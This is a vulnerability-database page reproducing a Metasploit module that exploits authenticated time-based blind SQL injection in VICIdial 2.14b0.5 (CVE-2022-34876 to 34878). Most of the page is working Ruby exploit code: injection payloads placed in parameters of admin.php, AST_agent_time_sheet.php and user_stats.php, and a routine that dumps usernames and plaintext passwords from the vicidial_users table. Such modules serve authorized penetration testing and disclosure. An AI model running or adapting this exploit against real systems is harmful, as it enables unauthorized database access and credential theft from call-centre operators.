Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

VICIdial Multiple Authenticated SQLi

🗓️ 22 Sep 2022 19:49:27Reported by h00dieType 
metasploit
 metasploit🔗 www.rapid7.com👁 254 Views

VICIdial 2.14b0.5 Authenticated SQL Injectio

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::SQLi

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VICIdial Multiple Authenticated SQLi',
        'Description' => %q{
          This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to
          svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).
          Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter.
          Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter.
          Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter.
          Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter.
          Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter.
          VICIdial does not encrypt passwords by default.
        },
        'Author' => [
          'h00die' # msf module, discovery
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'https://www.vicidial.org/VICIDIALforum/viewtopic.php?f=4&t=41300&sid=aacb27a29fefd85265b4d55fe51122af'],
          [ 'CVE', '2022-34876'], # admin.php
          [ 'CVE', '2022-34877'], # AST_agent_time_sheet.php
          [ 'CVE', '2022-34878'] # user_stats.php
        ],
        'Actions' => [
          ['List Users - modify_email_accounts method', { 'Description' => 'Queries username, password for COUNT users' }],
          ['List Users - access_recordings method', { 'Description' => 'Queries username, password for COUNT users' }],
          ['List Users - agentcall_email method', { 'Description' => 'Queries username, password for COUNT users' }],
          ['List Users - agent_time_sheet method', { 'Description' => 'Queries username, password for COUNT users' }],
          ['List Users - user_stats method', { 'Description' => 'Queries username, password for COUNT users' }],
        ],
        'DefaultAction' => 'List Users',
        'DisclosureDate' => '2022-04-19',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )
    register_options [
      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]),
      OptString.new('USERNAME', [true, 'Valid Username for login', '6666']),
      OptString.new('PASSWORD', [true, 'Valid Password for login', '']),
      OptString.new('ACTION', [true, 'Valid Password for login', 'List Users - access_recordings method'])
    ]
  end

  def post_4a
    {
      'ADD' => '4A',
      'custom_fields_modify' => '0',
      'user' => '111',
      'pass' => '111',
      'force_change_password' => 'N',
      'full_name' => '111',
      'user_level' => '1',
      'user_group' => 'ADMIN',
      'phone_login' => '111',
      'phone_pass' => '111',
      'active' => 'Y',
      'voicemail_id' => '',
      'email' => '',
      'mobile_number' => '',
      'user_code' => '',
      'user_location' => '',
      'territory' => '',
      'user_nickname' => '',
      'user_new_lead_limit' => '-1',
      'agent_choose_ingroups' => '1',
      'agent_choose_blended' => '1',
      'hotkeys_active' => '0',
      'scheduled_callbacks' => '1',
      'agentonly_callbacks' => '0',
      'next_dial_my_callbacks' => 'NOT_ACTIVE',
      'agentcall_manual' => '0',
      'manual_dial_filter' => 'DISABLED',
      'agentcall_email' => '0',
      'agentcall_chat' => '0',
      'vicidial_recording' => '1',
      'vicidial_transfers' => '1',
      'closer_default_blended' => '0',
      'user_choose_language' => '0',
      'selected_language' => 'defaultEnglish',
      'vicidial_recording_override' => 'DISABLED',
      'mute_recordings' => 'DISABLED',
      'alter_custdata_override' => 'NOT_ACTIVE',
      'alter_custphone_override' => 'NOT_ACTIVE',
      'agent_shift_enforcement_override' => 'DISABLED',
      'agent_call_log_view_override' => 'DISABLED',
      'hide_call_log_info' => 'DISABLED',
      'agent_lead_search' => 'NOT_ACTIVE',
      'lead_filter_id' => 'NONE',
      'user_hide_realtime' => '0',
      'allow_alerts' => '0',
      'preset_contact_search' => 'NOT_ACTIVE',
      'max_inbound_calls' => '0',
      'max_inbound_filter_enabled' => '0',
      'max_inbound_filter_min_sec' => '-1',
      'max_hopper_calls' => '0',
      'max_hopper_calls_hour' => '0',
      'wrapup_seconds_override' => '-1',
      'ready_max_logout' => '-1',
      'status_group_id' => '',
      'custom_one' => '',
      'custom_two' => '',
      'custom_three' => '',
      'custom_four' => '',
      'custom_five' => '',
      'qc_enabled' => '0',
      'qc_user_level' => '1',
      'qc_pass' => '0',
      'qc_finish' => '0',
      'qc_commit' => '0',
      'realtime_block_user_info' => '0',
      'admin_hide_lead_data' => '0',
      'admin_hide_phone_data' => '0',
      'ignore_group_on_search' => '0',
      'user_admin_redirect_url' => '',
      'view_reports' => '0',
      'access_recordings' => '0',
      'alter_agent_interface_options' => '0',
      'modify_users' => '0',
      'change_agent_campaign' => '0',
      'delete_users' => '0',
      'modify_usergroups' => '0',
      'delete_user_groups' => '0',
      'modify_lists' => '0',
      'delete_lists' => '0',
      'load_leads' => '0',
      'modify_leads' => '0',
      'export_gdpr_leads' => '0',
      'download_lists' => '0',
      'export_reports' => '0',
      'delete_from_dnc' => '0',
      'modify_campaigns' => '0',
      'campaign_detail' => '0',
      'delete_campaigns' => '0',
      'modify_ingroups' => '0',
      'delete_ingroups' => '0',
      'modify_inbound_dids' => '0',
      'delete_inbound_dids' => '0',
      'modify_custom_dialplans' => '0',
      'modify_remoteagents' => '0',
      'delete_remote_agents' => '0',
      'modify_scripts' => '0',
      'delete_scripts' => '0',
      'modify_filters' => '0',
      'delete_filters' => '0',
      'ast_admin_access' => '0',
      'ast_delete_phones' => '0',
      'modify_call_times' => '0',
      'delete_call_times' => '0',
      'modify_servers' => '0',
      'modify_shifts' => '0',
      'modify_phones' => '0',
      'modify_carriers' => '0',
      'modify_email_accounts' => '0',
      'vKik' => 'vKik',
      'modify_labels' => '0',
      'modify_colors' => '0',
      'modify_languages' => '0',
      'modify_statuses' => '0',
      'modify_voicemail' => '0',
      'modify_audiostore' => '0',
      'modify_moh' => '0',
      'modify_tts' => '0',
      'modify_contacts' => '0',
      'callcard_admin' => '0',
      'modify_auto_reports' => '0',
      'add_timeclock_log' => '0',
      'modify_timeclock_log' => '0',
      'delete_timeclock_log' => '0',
      'manager_shift_enforcement_override' => '0',
      'pause_code_approval' => '0',
      'admin_cf_show_hidden' => '0',
      'modify_ip_lists' => '0',
      'ignore_ip_list' => '0',
      'two_factor_override' => 'NOT_ACTIVE',
      'vdc_agent_api_access' => '0',
      'api_list_restrict' => '0',
      'api_allowed_functions[]' => 'ALL_FUNCTIONS',
      'api_only_user' => '0',
      'modify_same_user_level' => '1',
      'alter_admin_interface_options' => '1',
      'SUBMIT' => 'SUBMIT'
    }
  end

  def basic_auth
    user_pass = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
    {
      'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
    }
  end

  def inject_admin_page(param, payload)
    data = post_4a
    d = Rex::Text.rand_text_numeric(4)
    data[param] = "0' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'vicidial', 'admin.php'),
      'headers' => basic_auth,
      'vars_post' => data
    })

    fail_with Failure::Unreachable, 'Connection failed' unless res
  end

  def run_host(ip)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'vicidial', 'admin.php'),
      'headers' => basic_auth
    })

    fail_with(Failure::Unreachable, 'Failed to load website') unless res
    fail_with(Failure::NoAccess, 'Invalid login/password') if res.code == 401
    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
      d = Rex::Text.rand_text_numeric(4)
      if datastore['ACTION'] == 'List Users - modify_email_accounts method'
        inject_admin_page('modify_email_accounts', payload)
      elsif datastore['ACTION'] == 'List Users - access_recordings method'
        inject_admin_page('access_recordings', payload)
      elsif datastore['ACTION'] == 'List Users - agentcall_email method'
        inject_admin_page('agentcall_email', payload)
      elsif datastore['ACTION'] == 'List Users - agent_time_sheet method'
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'vicidial', 'AST_agent_time_sheet.php'),
          'headers' => basic_auth,
          'vars_get' => {
            'agent' => "0' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"
          }
        })
      elsif datastore['ACTION'] == 'List Users - user_stats method'
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'vicidial', 'user_stats.php'),
          'headers' => basic_auth,
          'vars_get' => {
            'DB' => '',
            'pause_code_rpt' => '',
            'park_rpt' => '1',
            'did_id' => '',
            'did' => '',
            'begin_date' => Date.today.to_s,
            'end_date' => Date.today.to_s,
            'user' => '',
            'submit' => 'submit',
            'search_archived_data' => '',
            'NVAuser' => '',
            'file_download' => "1' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"
          }
        })
      end
    end

    unless @sqli.test_vulnerable
      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
      return
    end
    columns = ['user', 'pass']

    print_status('Enumerating Usernames and Password Hashes')
    data = @sqli.dump_table_fields('vicidial_users', columns, '', datastore['COUNT'])

    table = Rex::Text::Table.new('Header' => 'vicidial_users', 'Indent' => 1, 'Columns' => columns)
    data.each do |user|
      create_credential({
        workspace_id: myworkspace_id,
        origin_type: :service,
        module_fullname: fullname,
        username: user[0],
        private_type: :password,
        private_data: user[1],
        service_name: 'VICIdial',
        address: ip,
        port: datastore['RPORT'],
        protocol: 'tcp',
        status: Metasploit::Model::Login::Status::UNTRIED
      })
      table << user
    end
    print_good('Dumped table contents:')
    print_line(table.to_s)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jun 2026 19:01Current
9.1High risk
Vulners AI Score9.1
vicidialauthenticatedsql injectionvulnerabilityuser accountspassword encryption
254